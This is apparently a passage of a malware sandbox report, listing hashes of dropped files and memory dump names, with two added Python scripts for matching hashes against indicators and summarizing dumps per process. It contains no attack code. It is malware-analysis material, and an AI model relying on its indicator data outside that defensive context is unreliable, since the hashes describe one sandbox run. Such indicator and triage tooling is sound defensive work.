  SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
  SHA512: cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
- \??\c:\Users\Admin\AppData\Local\Temp\vs1ezoe0\CSC29E85CA2AA6F4C6ABF3767A694F2658A.TMP
  MD5: 141b15e759b3312958cb6ce32f916f5b
  SHA1: 375e9d1a036f7d7ff111fd79006de6f5f9e74a9c
  SHA256: 3cf77bdca29501c5e3ec32c857ea82a43dfe9b1ad624eb16609e2296af617c0e
  SHA512: 0ebf0f0284324af8e6b65f3f81b177d30a2501ba9bcd5fc65231e24b34eb2ee1c72a4c7031e6b8b6c8722ddcdef36da290d9b9f4244dc6c3ae615b1e24b77e33
- \??\c:\Users\Admin\AppData\Local\Temp\vs1ezoe0\vs1ezoe0.0.cs
  MD5: 4864fc038c0b4d61f508d402317c6e9a
  SHA1: 72171db3eea76ecff3f7f173b0de0d277b0fede7
  SHA256: 0f5273b8fce9bfd95677be80b808119c048086f8e17b2e9f9964ae8971bd5a84
  SHA512: 9e59e8bee83e783f8054a3ba90910415edacfa63cc19e5ded9d4f21f7c3005ca48c63d85ce8523a5f7d176aa5f8abafc28f824c10dbfb254eed1ce6e5f55bf31
- \??\c:\Users\Admin\AppData\Local\Temp\vs1ezoe0\vs1ezoe0.cmdline
  MD5: f3f94e29ae2114b6b614c24f41170b93
  SHA1: 54b9b33c6f75f4b737d36ff00a9bf734ac6f070f
  SHA256: cd1dddc3bcc64999a4874e00aeb492d56439e1127843c0eb0af27bf847b272f8
  SHA512: c3829b864c25dcd10c2be1211ad78c9aae75a2ee18e8894236bddf23d97e159d7efa1010574c17a1f5df6a02e63c38fee30bd876fce6749ba31c194a6dafb820
- \Windows\Branding\mediasrv.png
  MD5: 96a6c5d47b0670a98699b2b424e2e65e
  SHA1: 57a31831c368efd82801f94a1b72c7230f4288be
  SHA256: bba6c1f56f0b7f40778d8e862aba528160e02890bb0313dfe1f934e4aafca05f
  SHA512: b3107141bc206c12afc80c673463288057d6d302c44b568746af5e530f214c5e136ca7edb07c70afa0b6abd6720e7cd4917a4cdd6c82c7d3d5528b76222e6c55
- \Windows\Branding\mediasvc.png
  MD5: a3da4eee0a06c45c5bec80fd959ad539
  SHA1: a8d2d3691af2e1af85ed8947347d0981017b7a32
  SHA256: 8a7fc19bdb25f16870854c72f936ed9598ffefc4da506bad61e13a890acfae9c
  SHA512: 8d3dcf7d05930b390f8c8928d8910c0b8aa19604d195c8ab4001b73a4866ad4adabc772bee9a391433c2946eeb427f4f1e08092ee8dc7056fe45a1db035e822b
-
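One entry in the hash table above deserves a caveat before any of it is turned into detections: the four digests listed for \??\PIPE\lsarpc (d41d8cd9..., da39a3ee..., e3b0c442..., cf83e135...) are the MD5, SHA-1, SHA-256 and SHA-512 of zero bytes, so the sandbox hashed an empty handle to the LSA RPC named pipe, not a dropped payload, and a blocklist built from that row would fire on every empty file. The script below is an added example, not part of the sandbox report: it hashes a file or buffer with the same four algorithms, matches the result against a subset of the table (copied verbatim into REPORT_IOCS; the remaining rows can be pasted in the same shape), and refuses to treat zero-byte rows as indicators. It assumes Python 3 with only the standard library; the "constructed" input bytes are made up for the demonstration and are not the sample.

```python
import hashlib

# Added example: verify files against the dropped-file hashes in the report
# above and flag rows that are really the digest of zero bytes.
ALGOS = ("md5", "sha1", "sha256", "sha512")

# A subset of the report's hash table, copied verbatim; paste the remaining
# rows in the same shape. Keys are the artifact paths as the report prints them.
REPORT_IOCS = {
    r"\Windows\Branding\mediasrv.png": {
        "md5": "96a6c5d47b0670a98699b2b424e2e65e",
        "sha1": "57a31831c368efd82801f94a1b72c7230f4288be",
        "sha256": "bba6c1f56f0b7f40778d8e862aba528160e02890bb0313dfe1f934e4aafca05f",
    },
    r"\Windows\Branding\mediasvc.png": {
        "md5": "a3da4eee0a06c45c5bec80fd959ad539",
        "sha256": "8a7fc19bdb25f16870854c72f936ed9598ffefc4da506bad61e13a890acfae9c",
    },
    r"\??\PIPE\lsarpc": {
        "md5": "d41d8cd98f00b204e9800998ecf8427e",
        "sha1": "da39a3ee5e6b4b0d3255bfef95601890afd80709",
        "sha256": "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855",
        "sha512": "cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce"
                  "47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e",
    },
}


def digest_bytes(data: bytes) -> dict:
    """All four digests of an in-memory buffer, as lowercase hex."""
    return {algo: hashlib.new(algo, data).hexdigest() for algo in ALGOS}


def digest_file(path: str, chunk: int = 1 << 20) -> dict:
    """Same as digest_bytes, streamed so a large drop is not read into memory whole."""
    hashers = {algo: hashlib.new(algo) for algo in ALGOS}
    with open(path, "rb") as fh:
        for block in iter(lambda: fh.read(chunk), b""):
            for h in hashers.values():
                h.update(block)
    return {algo: h.hexdigest() for algo, h in hashers.items()}


# Digests of b"": a row equal to these says nothing about file content.
EMPTY_DIGESTS = digest_bytes(b"")


def is_empty_artifact(entry: dict) -> bool:
    """True when every hash the report lists for an artifact is a zero-byte digest."""
    return all(EMPTY_DIGESTS[algo] == value for algo, value in entry.items())


def weak_iocs(iocs: dict = REPORT_IOCS) -> list:
    """Report paths whose hashes must not go on a blocklist (they match any empty file)."""
    return [path for path, entry in iocs.items() if is_empty_artifact(entry)]


def match_iocs(digests: dict, iocs: dict = REPORT_IOCS, skip_empty: bool = True) -> list:
    """Report paths whose every listed hash agrees with `digests`.

    Only algorithms present on both sides are compared, so a partial row
    (MD5 + SHA-256 only) still matches. Zero-byte rows are skipped by default
    so an empty file on disk is not reported as the LSA pipe artifact.
    """
    hits = []
    for path, entry in iocs.items():
        if skip_empty and is_empty_artifact(entry):
            continue
        shared = [algo for algo in entry if algo in digests]
        if shared and all(digests[algo] == entry[algo] for algo in shared):
            hits.append(path)
    return hits


if __name__ == "__main__":
    # Constructed input, not the real dropper: demonstrates a non-match.
    sample = b"MZ\x90\x00constructed, not the sample"
    print("rows that only hash zero bytes:", weak_iocs())
    print("matches for constructed bytes:", match_iocs(digest_bytes(sample)))
    print("matches for an empty file, filter off:",
          match_iocs(EMPTY_DIGESTS, skip_empty=False))
```

Run it against a suspect file with `match_iocs(digest_file(path))`; the comparison deliberately uses every algorithm the row lists rather than MD5 alone, and `weak_iocs()` is the check to run over any hash table before it is exported to a blocklist.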
memory/200-238-0x0000000000000000-mapping.dmp
-
memory/416-231-0x0000000000000000-mapping.dmp
-
memory/504-213-0x0000000000000000-mapping.dmp
-
memory/728-211-0x0000000000000000-mapping.dmp
-
memory/736-116-0x000001F26E190000-0x000001F26E192000-memory.dmp
Filesize 8KB
-
memory/736-119-0x000001F26E196000-0x000001F26E197000-memory.dmp
Filesize 4KB
-
memory/736-118-0x000001F26E195000-0x000001F26E196000-memory.dmp
Filesize 4KB
-
memory/736-117-0x000001F26E193000-0x000001F26E195000-memory.dmp
Filesize 8KB
-
memory/736-114-0x000001F2706A0000-0x000001F270AC1000-memory.dmp
Filesize 4.1MB
-
memory/776-222-0x0000000000000000-mapping.dmp
-
memory/780-218-0x0000000000000000-mapping.dmp
-
memory/1012-235-0x0000000000000000-mapping.dmp
-
memory/1060-219-0x0000000000000000-mapping.dmp
-
memory/1204-225-0x0000000000000000-mapping.dmp
-
memory/1316-140-0x0000000000000000-mapping.dmp
-
memory/1448-209-0x000001B7762D8000-0x000001B7762DA000-memory.dmp
Filesize 8KB
-
memory/1448-205-0x0000000000000000-mapping.dmp
-
memory/1448-208-0x000001B7762D6000-0x000001B7762D8000-memory.dmp
Filesize 8KB
-
memory/1448-207-0x000001B7762D3000-0x000001B7762D5000-memory.dmp
Filesize 8KB
-
memory/1448-206-0x000001B7762D0000-0x000001B7762D2000-memory.dmp
Filesize 8KB
-
memory/1496-249-0x0000000000000000-mapping.dmp
-
memory/1568-247-0x0000000000000000-mapping.dmp
-
memory/1628-167-0x000001943FB00000-0x000001943FB02000-memory.dmp
Filesize 8KB
-
memory/1628-168-0x000001943FB03000-0x000001943FB05000-memory.dmp
Filesize 8KB
-
memory/1628-192-0x000001943FB06000-0x000001943FB08000-memory.dmp
Filesize 8KB
-
memory/1628-159-0x0000000000000000-mapping.dmp
-
memory/1628-197-0x000001943FB08000-0x000001943FB0A000-memory.dmp
Filesize 8KB
-
memory/1688-234-0x0000000000000000-mapping.dmp
-
memory/1688-246-0x0000000000000000-mapping.dmp
-
memory/1968-204-0x00000277CC526000-0x00000277CC528000-memory.dmp
Filesize 8KB
-
memory/1968-201-0x0000000000000000-mapping.dmp
-
memory/1968-229-0x0000000000000000-mapping.dmp
-
memory/1968-202-0x00000277CC520000-0x00000277CC522000-memory.dmp
Filesize 8KB
-
memory/1968-203-0x00000277CC523000-0x00000277CC525000-memory.dmp
Filesize 8KB
-
memory/2128-215-0x0000000000000000-mapping.dmp
-
memory/2248-242-0x0000019B7F410000-0x0000019B7F412000-memory.dmp
Filesize 8KB
-
memory/2248-233-0x0000000000000000-mapping.dmp
-
memory/2248-244-0x0000019B7F416000-0x0000019B7F418000-memory.dmp
Filesize 8KB
-
memory/2248-243-0x0000019B7F413000-0x0000019B7F415000-memory.dmp
Filesize 8KB
-
memory/2248-241-0x0000000000000000-mapping.dmp
-
memory/2248-245-0x0000019B7F418000-0x0000019B7F419000-memory.dmp
Filesize 4KB
-
memory/2304-217-0x0000000000000000-mapping.dmp
-
memory/2308-228-0x0000000000000000-mapping.dmp
-
memory/2380-240-0x0000000000000000-mapping.dmp
-
memory/2572-210-0x0000000000000000-mapping.dmp
-
memory/2588-220-0x0000000000000000-mapping.dmp
-
memory/2592-227-0x0000000000000000-mapping.dmp
-
memory/2832-226-0x0000000000000000-mapping.dmp
-
memory/2832-212-0x0000000000000000-mapping.dmp
-
memory/2860-130-0x0000018F777F3000-0x0000018F777F5000-memory.dmp
Filesize 8KB
-
memory/2860-146-0x0000018F777F8000-0x0000018F777F9000-memory.dmp
Filesize 4KB
-
memory/2860-129-0x0000018F777F0000-0x0000018F777F2000-memory.dmp
Filesize 8KB
-
memory/2860-152-0x0000018F78630000-0x0000018F78631000-memory.dmp
Filesize 4KB
-
memory/2860-128-0x0000018F77D50000-0x0000018F77D51000-memory.dmp
Filesize 4KB
-
memory/2860-125-0x0000018F77500000-0x0000018F77501000-memory.dmp
Filesize 4KB
-
memory/2860-120-0x0000000000000000-mapping.dmp
-
memory/2860-151-0x0000018F782A0000-0x0000018F782A1000-memory.dmp
Filesize 4KB
-
memory/2860-139-0x0000018F777F6000-0x0000018F777F8000-memory.dmp
Filesize 8KB
-
memory/2860-144-0x0000018F77790000-0x0000018F77791000-memory.dmp
Filesize 4KB
-
memory/3172-221-0x0000000000000000-mapping.dmp
-
memory/3176-216-0x0000000000000000-mapping.dmp
-
memory/3364-239-0x0000000000000000-mapping.dmp
-
memory/3452-236-0x0000000000000000-mapping.dmp
-
memory/3628-214-0x0000000000000000-mapping.dmp
-
memory/3732-248-0x0000000000000000-mapping.dmp
-
memory/3812-136-0x0000000000000000-mapping.dmp
-
memory/3920-232-0x0000000000000000-mapping.dmp
-
memory/3960-230-0x0000000000000000-mapping.dmp
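The memory artifact names above encode everything needed to triage them without opening a single dump: `memory/PID-SEQ-0xSTART-0xEND-memory.dmp` is a region dump whose size is END minus START (0x000001F270AC1000 minus 0x000001F2706A0000 is 0x421000 bytes, the 4.1MB the report prints for PID 736), while the `0x0000000000000000-mapping.dmp` names carry no end address and no size. The script below is an added example, not part of the sandbox report: it parses those names, totals dumped bytes per PID, reproduces the report's size labels, and picks out the largest region, which is the usual first stop when looking for an unpacked payload. It assumes Python 3 with only the standard library; SAMPLE_NAMES holds a few names copied from the list above, and the whole list parses the same way.

```python
import re
from collections import defaultdict

# Added example: turn the report's "memory/..." artifact names into records
# and total the dumped bytes per PID. Not part of the sandbox report.
DUMP_RE = re.compile(
    r"^memory/(?P<pid>\d+)-(?P<seq>\d+)-0x(?P<start>[0-9A-Fa-f]+)"
    r"(?:-0x(?P<end>[0-9A-Fa-f]+))?-(?P<kind>memory|mapping)\.dmp$"
)

# A few names copied from the list above; the whole list parses the same way.
SAMPLE_NAMES = [
    "memory/736-114-0x000001F2706A0000-0x000001F270AC1000-memory.dmp",
    "memory/736-116-0x000001F26E190000-0x000001F26E192000-memory.dmp",
    "memory/2248-233-0x0000000000000000-mapping.dmp",
    "memory/2248-245-0x0000019B7F418000-0x0000019B7F419000-memory.dmp",
    "memory/1688-234-0x0000000000000000-mapping.dmp",
]


def parse_dump_name(name: str) -> dict:
    """Split one artifact name into pid, sequence number, kind and address range.

    Region dumps carry "start-end"; mapping entries carry only a zero start
    and no end, so their size is recorded as 0.
    """
    m = DUMP_RE.match(name)
    if m is None:
        raise ValueError(f"not a sandbox memory artifact name: {name!r}")
    start = int(m["start"], 16)
    end = int(m["end"], 16) if m["end"] else None
    if end is not None and end < start:
        raise ValueError(f"end before start in {name!r}")
    return {
        "pid": int(m["pid"]),
        "seq": int(m["seq"]),
        "kind": m["kind"],
        "start": start,
        "end": end,
        "size": (end - start) if end is not None else 0,
    }


def human_size(n: int) -> str:
    """Size label in the report's own style: whole KB below 1 MiB, one decimal MB above.

    The one-decimal rule is an assumption that matches the labels on this page.
    """
    if n >= 1 << 20:
        return f"{n / (1 << 20):.1f}MB"
    return f"{n // 1024}KB"


def summarize(names) -> dict:
    """Per-PID counts of region dumps, dumped bytes and mapping entries."""
    per_pid = defaultdict(lambda: {"regions": 0, "bytes": 0, "mappings": 0})
    for name in names:
        rec = parse_dump_name(name)
        bucket = per_pid[rec["pid"]]
        if rec["kind"] == "mapping":
            bucket["mappings"] += 1
        else:
            bucket["regions"] += 1
            bucket["bytes"] += rec["size"]
    return dict(per_pid)


def largest_region(names) -> dict:
    """The single biggest region dump: the usual first place to look for an unpacked payload."""
    regions = [r for r in (parse_dump_name(n) for n in names) if r["kind"] == "memory"]
    if not regions:
        raise ValueError("no region dumps in input")
    return max(regions, key=lambda r: r["size"])


if __name__ == "__main__":
    for pid, stats in sorted(summarize(SAMPLE_NAMES).items()):
        print(f"pid {pid}: {stats['regions']} regions, {human_size(stats['bytes'])}, "
              f"{stats['mappings']} mapping entries")
    big = largest_region(SAMPLE_NAMES)
    print(f"largest region: pid {big['pid']} seq {big['seq']} "
          f"{human_size(big['size'])} at 0x{big['start']:X}")
```

Feed it the full list from the page (one name per line) and the per-PID totals show at a glance which process accumulated the bulk of dumped memory; the 8KB and 4KB regions are the size of one or two pages and are rarely worth opening before the multi-megabyte one.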